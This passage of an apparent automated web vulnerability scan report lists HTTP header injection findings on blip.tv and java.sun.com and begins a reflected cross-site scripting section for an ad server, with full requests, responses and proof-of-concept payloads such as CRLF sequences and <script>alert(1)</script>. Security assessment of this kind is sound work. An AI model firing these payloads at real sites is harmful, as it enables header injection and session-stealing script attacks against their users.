<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/posts/7e782
dfaef70a8a1">he
...[SNIP]...

2.236. http://blip.tv/prefs/security/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /prefs/security/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9d984%0d%0adeedf2ae191 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9d984%0d%0adeedf2ae191/security/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/9d984
deedf2ae191
/security/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 303
Date: Thu, 20 Jan 2011 00:39:07 GMT
X-Varnish: 1324533869
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/9d984
deedf2ae191/security/
...[SNIP]...

2.237. http://blip.tv/prefs/security/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /prefs/security/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 548cc%0d%0a6fdc2af0610 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /prefs/548cc%0d%0a6fdc2af0610/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/prefs/548cc
6fdc2af0610
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:39:08 GMT
X-Varnish: 1025273584
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/prefs/548cc
6fdc2af0610/">h
...[SNIP]...

2.238. http://blip.tv/random [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /random

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 778ef%0d%0a0ce99cdfdfd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /778ef%0d%0a0ce99cdfdfd HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/778ef
0ce99cdfdfd

Content-Type: text/html; charset=iso-8859-1
Content-Length: 293
Date: Thu, 20 Jan 2011 00:38:56 GMT
X-Varnish: 2146050195
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/778ef
0ce99cdfdfd">here</a>
...[SNIP]...

2.239. http://blip.tv/recent [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /recent

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 888f6%0d%0aa3fc8004d0a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /888f6%0d%0aa3fc8004d0a HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/888f6
a3fc8004d0a

Content-Type: text/html; charset=iso-8859-1
Content-Length: 278
Date: Thu, 20 Jan 2011 00:38:55 GMT
X-Varnish: 1324531933
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/888f6
a3fc8004d0a">here</a>
...[SNIP]...

2.240. http://blip.tv/report_form/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /report_form/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 92db0%0d%0aa554397957c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /92db0%0d%0aa554397957c/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/92db0
a554397957c
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 279
Date: Thu, 20 Jan 2011 00:39:11 GMT
X-Varnish: 1324534466
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/92db0
a554397957c/">here</a
...[SNIP]...

2.241. http://blip.tv/rss [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /rss

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ff801%0d%0a89d985fd93 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ff801%0d%0a89d985fd93 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/ff801
89d985fd93

Content-Type: text/html; charset=iso-8859-1
Content-Length: 277
Date: Thu, 20 Jan 2011 00:39:40 GMT
X-Varnish: 1324538033
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/ff801
89d985fd93">here</a>.
...[SNIP]...

2.242. http://blip.tv/rss/flash/4658178 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /rss/flash/4658178

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 59a80%0d%0a49d824c3177 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /59a80%0d%0a49d824c3177/flash/4658178 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/59a80
49d824c3177
/flash/4658178
Content-Type: text/html; charset=iso-8859-1
Content-Length: 292
Date: Thu, 20 Jan 2011 00:39:17 GMT
X-Varnish: 1498224698
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/59a80
49d824c3177/flash/465
...[SNIP]...

2.243. http://blip.tv/search [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /search

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 67fe1%0d%0a43cf9793345 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /67fe1%0d%0a43cf9793345 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/67fe1
43cf9793345

Content-Type: text/html; charset=iso-8859-1
Content-Length: 293
Date: Thu, 20 Jan 2011 00:39:11 GMT
X-Varnish: 1248912469
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/67fe1
43cf9793345">here</a>
...[SNIP]...

2.244. http://blip.tv/tools/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /tools/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 58140%0d%0a77d07a20ef2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /58140%0d%0a77d07a20ef2/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/58140
77d07a20ef2
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 279
Date: Thu, 20 Jan 2011 00:39:01 GMT
X-Varnish: 1025272549
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/58140
77d07a20ef2/">here</a
...[SNIP]...

2.245. http://blip.tv/tos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /tos/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload eeffd%0d%0aee8661e2d6a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /eeffd%0d%0aee8661e2d6a/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/eeffd
ee8661e2d6a
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 294
Date: Thu, 20 Jan 2011 00:39:09 GMT
X-Varnish: 2146052258
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/eeffd
ee8661e2d6a/">here</a
...[SNIP]...

2.246. http://blip.tv/users/blogging_info [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /users/blogging_info

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2bbca%0d%0a3f56472e5e4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2bbca%0d%0a3f56472e5e4/blogging_info?posts_id=4658178&no_wrap=1 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/2bbca
3f56472e5e4
/blogging_info?posts_id=4658178&no_wrap=1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 323
Date: Thu, 20 Jan 2011 00:38:54 GMT
X-Varnish: 1248909706
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/2bbca
3f56472e5e4/blogging_
...[SNIP]...

2.247. http://blip.tv/users/blogging_info [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /users/blogging_info

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 61ba9%0d%0a48398cbb55a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /users/61ba9%0d%0a48398cbb55a?posts_id=4658178&no_wrap=1 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/users/61ba9
48398cbb55a
?posts_id=4658178&no_wrap=1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 315
Date: Thu, 20 Jan 2011 00:38:55 GMT
X-Varnish: 1324531887
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/users/61ba9
48398cbb55a?pos
...[SNIP]...

2.248. http://blip.tv/users/create/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /users/create/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b978d%0d%0a85dffaa1bb8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b978d%0d%0a85dffaa1bb8/create/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/b978d
85dffaa1bb8
/create/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:51 GMT
X-Varnish: 1248909074
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/b978d
85dffaa1bb8/create/">
...[SNIP]...

2.249. http://blip.tv/users/create/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /users/create/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b0b83%0d%0a934141a9f8a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /users/b0b83%0d%0a934141a9f8a/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/users/b0b83
934141a9f8a
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:38:51 GMT
X-Varnish: 1274885483
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/users/b0b83
934141a9f8a/">h
...[SNIP]...

2.250. http://blip.tv/users/login/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /users/login/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8a64b%0d%0a295d52c66b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8a64b%0d%0a295d52c66b0/login/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/8a64b
295d52c66b0
/login/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 300
Date: Thu, 20 Jan 2011 00:38:51 GMT
X-Varnish: 1324531121
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/8a64b
295d52c66b0/login/">h
...[SNIP]...

2.251. http://blip.tv/users/login/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /users/login/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 105d8%0d%0a88428ed14e8 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /users/105d8%0d%0a88428ed14e8/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/users/105d8
88428ed14e8
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:38:51 GMT
X-Varnish: 2146049249
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/users/105d8
88428ed14e8/">h
...[SNIP]...

2.252. http://blip.tv/users/stats/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /users/stats/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e17ed%0d%0ad0c42b6818c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e17ed%0d%0ad0c42b6818c/stats/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/e17ed
d0c42b6818c
/stats/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:38:53 GMT
X-Varnish: 1274885804
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/e17ed
d0c42b6818c/stats/">h
...[SNIP]...

2.253. http://blip.tv/users/stats/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /users/stats/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 3080a%0d%0ad04494d6657 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /users/3080a%0d%0ad04494d6657/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/users/3080a
d04494d6657
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:38:53 GMT
X-Varnish: 1498220902
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/users/3080a
d04494d6657/">h
...[SNIP]...

2.254. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.sun.com
Path:   /products/plugin/autodl/jinstall-1_4_2-windows-i586.cab

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 2811c%0d%0ac2ddb1d3f25 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /products/plugin/autodl/jinstall-1_4_2-windows-i586.cab2811c%0d%0ac2ddb1d3f25 HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 20 Jan 2011 00:42:25 GMT
Location: /update/1.4.2/jinstall-1_4_2-windows-i586.cab2811c
c2ddb1d3f25

Content-length: 0
Connection: close


3. Cross-site scripting (reflected)

There are 41 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://a.collective-media.net/ad/cm.martini/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.martini/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 621ff<script>alert(1)</script>e20b2a52729 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad621ff<script>alert(1)</script>e20b2a52729/cm.martini/ HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; mmpg=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 69
Vary: Accept-Encoding
Date: Thu, 20 Jan 2011 00:35:10 GMT
Connection: close

unknown path /ad621ff<script>alert(1)</script>e20b2a52729/cm.martini/

3.2. http://a.collective-media.net/adj/cm.martini/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.martini/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f4db'-alert(1)-'1de1bb3448d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.martini3f4db'-alert(1)-'1de1bb3448d/;sz=728x90;click0=http%3a%2f%2fad.afy11.net%2fad%3fc%3dEPLFVb4gYEitVIXNBCKa0xQ7E-q0hdHagyKSV9rbMGn0fJ9zsbGZN4CyKa6mnyBGPxQkyumws5Xt6rwuZek5LVXWIZUsD%2bx8G9fs11dXeU4%3d!;ord=3271752524? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; dc=dc

Response

